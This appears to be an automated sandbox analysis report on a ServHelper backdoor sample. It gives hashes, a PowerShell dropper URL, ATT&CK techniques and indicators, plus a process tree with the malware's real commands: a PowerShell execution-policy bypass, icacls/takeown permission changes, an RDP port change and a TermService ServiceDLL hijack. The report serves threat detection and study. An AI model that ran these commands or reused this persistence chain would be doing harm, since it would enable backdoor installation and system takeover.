servhelper | 2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c

Analysis

max time kernel
94s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-10-2024 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
Size

5.9MB
MD5

4069c013a2ec0c082f78a73719dcabb7
SHA1

14d643ed38a6c64c299bc24379b5b66ac958aff6
SHA256

2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c
SHA512

5a5bdfa931a1f9a2b8855e6331669404f332f504f15a5eae7fb6e51f7ac99bbb83f5c986931fadb00c761e81617a47707cff811eb6e2ebf55369cec8f6002f05
SSDEEP

49152:pFWJLirb/TkvO90dL3BmAFd4A64nsfJ5mb5KN0ZKrVbLMe8paAzK1X4FXtPqnJ0x:pF8mmMmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

cmd.exenet1.exenet.execmd.exenet.exenet1.exe

pid process

3848 cmd.exe
4064 net1.exe
800 net.exe
1748 cmd.exe
2468 net.exe
2104 net1.exe

pid	process
3848	cmd.exe
4064	net1.exe
800	net.exe
1748	cmd.exe
2468	net.exe
2104	net1.exe

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
24	4904	powershell.exe
26	4904	powershell.exe
28	4904	powershell.exe
32	4904	powershell.exe
34	4904	powershell.exe
36	4904	powershell.exe
38	4904	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

412 cmd.exe
2524 net.exe
4360 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2264 icacls.exe
1444 icacls.exe
3804 icacls.exe
5044 takeown.exe
3060 icacls.exe
1148 icacls.exe
4224 icacls.exe
1468 icacls.exe

pid	process
412	cmd.exe
2524	net.exe
4360	net1.exe

pid	process
2264	icacls.exe
1444	icacls.exe
3804	icacls.exe
5044	takeown.exe
3060	icacls.exe
1148	icacls.exe
4224	icacls.exe
1468	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1592
1592
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2264 icacls.exe
1444 icacls.exe
3804 icacls.exe
5044 takeown.exe
3060 icacls.exe
1148 icacls.exe
4224 icacls.exe
1468 icacls.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

24 raw.githubusercontent.com
23 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1592
1592

pid	process
2264	icacls.exe
1444	icacls.exe
3804	icacls.exe
5044	takeown.exe
3060	icacls.exe
1148	icacls.exe
4224	icacls.exe
1468	icacls.exe

flow	ioc
24	raw.githubusercontent.com
23	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID2C1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID332.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ayeih1ip.ul1.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID2E2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID302.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0spwom10.rlr.psm1	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID2E1.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

3184 powershell.exe
3464 powershell.exe
3740 powershell.exe
4904 powershell.exe
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

5012 WMIC.exe

pid	process
3184	powershell.exe
3464	powershell.exe
3740	powershell.exe
4904	powershell.exe

pid	process
5012	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3452 reg.exe
Runs net.exe

pid	process
3452	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1460	powershell.exe
1460	powershell.exe
3184	powershell.exe
3184	powershell.exe
3464	powershell.exe
3464	powershell.exe
3740	powershell.exe
3740	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
4904	powershell.exe
4904	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

656
656

pid	process
656
656

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1572	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeRestorePrivilege	1148	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	5012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5012	WMIC.exe
Token: SeAuditPrivilege	5012	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	5012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5012	WMIC.exe
Token: SeAuditPrivilege	5012	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1524	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1524	WMIC.exe
Token: SeAuditPrivilege	1524	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1524	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1524	WMIC.exe
Token: SeAuditPrivilege	1524	WMIC.exe
Token: SeDebugPrivilege	4904	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1572 wrote to memory of 1460	1572	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe	powershell.exe
PID 1572 wrote to memory of 1460	1572	4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe	powershell.exe
PID 1460 wrote to memory of 5052	1460	powershell.exe	csc.exe
PID 1460 wrote to memory of 5052	1460	powershell.exe	csc.exe
PID 5052 wrote to memory of 4796	5052	csc.exe	cvtres.exe
PID 5052 wrote to memory of 4796	5052	csc.exe	cvtres.exe
PID 1460 wrote to memory of 3184	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 3184	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 3464	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 3464	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 3740	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 3740	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 5044	1460	powershell.exe	takeown.exe
PID 1460 wrote to memory of 5044	1460	powershell.exe	takeown.exe
PID 1460 wrote to memory of 3060	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 3060	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1148	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1148	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 4224	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 4224	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1468	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1468	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 2264	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 2264	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1444	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 1444	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 3804	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 3804	1460	powershell.exe	icacls.exe
PID 1460 wrote to memory of 3944	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 3944	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 3452	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 3452	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 1452	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 1452	1460	powershell.exe	reg.exe
PID 1460 wrote to memory of 4516	1460	powershell.exe	net.exe
PID 1460 wrote to memory of 4516	1460	powershell.exe	net.exe
PID 4516 wrote to memory of 1804	4516	net.exe	net1.exe
PID 4516 wrote to memory of 1804	4516	net.exe	net1.exe
PID 1460 wrote to memory of 1692	1460	powershell.exe	cmd.exe
PID 1460 wrote to memory of 1692	1460	powershell.exe	cmd.exe
PID 1692 wrote to memory of 1768	1692	cmd.exe	cmd.exe
PID 1692 wrote to memory of 1768	1692	cmd.exe	cmd.exe
PID 1768 wrote to memory of 1944	1768	cmd.exe	net.exe
PID 1768 wrote to memory of 1944	1768	cmd.exe	net.exe
PID 1944 wrote to memory of 4704	1944	net.exe	net1.exe
PID 1944 wrote to memory of 4704	1944	net.exe	net1.exe
PID 1460 wrote to memory of 3012	1460	powershell.exe	cmd.exe
PID 1460 wrote to memory of 3012	1460	powershell.exe	cmd.exe
PID 3012 wrote to memory of 1868	3012	cmd.exe	cmd.exe
PID 3012 wrote to memory of 1868	3012	cmd.exe	cmd.exe
PID 1868 wrote to memory of 400	1868	cmd.exe	net.exe
PID 1868 wrote to memory of 400	1868	cmd.exe	net.exe
PID 400 wrote to memory of 4332	400	net.exe	net1.exe
PID 400 wrote to memory of 4332	400	net.exe	net1.exe
PID 412 wrote to memory of 2524	412	cmd.exe	net.exe
PID 412 wrote to memory of 2524	412	cmd.exe	net.exe
PID 2524 wrote to memory of 4360	2524	net.exe	net1.exe
PID 2524 wrote to memory of 4360	2524	net.exe	net1.exe
PID 4868 wrote to memory of 3564	4868	cmd.exe	net.exe
PID 4868 wrote to memory of 3564	4868	cmd.exe	net.exe
PID 3564 wrote to memory of 2888	3564	net.exe	net1.exe
PID 3564 wrote to memory of 2888	3564	net.exe	net1.exe
PID 1748 wrote to memory of 2468	1748	cmd.exe	net.exe
PID 1748 wrote to memory of 2468	1748	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2jugl4gk\2jugl4gk.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC5D.tmp" "c:\Users\Admin\AppData\Local\Temp\2jugl4gk\CSC4655CCF76F304B96BD91E02FDB701860.TMP"
      4⤵
      PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3740
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5044
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3060
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4224
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1468
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2264
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1444
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3804
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3944
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
